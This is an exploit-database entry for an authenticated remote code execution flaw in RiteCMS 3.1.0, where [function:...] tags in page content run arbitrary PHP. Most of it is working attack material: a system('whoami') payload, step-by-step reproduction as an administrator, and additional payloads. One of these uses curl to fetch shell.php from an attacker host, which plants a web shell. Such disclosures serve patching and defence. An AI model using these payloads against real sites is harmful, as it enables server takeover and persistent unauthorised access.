RiteCMS 3.1.0 - Authenticated Remote Code Execution

Author: red
type: webapps
platform: multiple
port: 
date_added: 2026-04-06 
date_updated: 2026-04-06 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution
# Date: 2025-10-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/handylulu/RiteCMS
# Software Link:
https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: 3.1.0
# Tested on: Windows XP


## Vulnerability Description
RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via
its content_function() handler: [function:...] tags in page content are
evaluated, allowing a user with page-editing privileges to execute
arbitrary PHP on the server.

## Exploit Code
Create or edit any page with the following content:

[function:system('whoami')]


## Steps to Reproduce
1. Login as administrator
2. Create new page or edit existing page
3. Insert [function:system('whoami')] in content
4. Save and view page
5. Command output will be displayed

## additional payloads
[function:system('curl http://attacker/shell.php -o shell.php')]
[function:system('id')]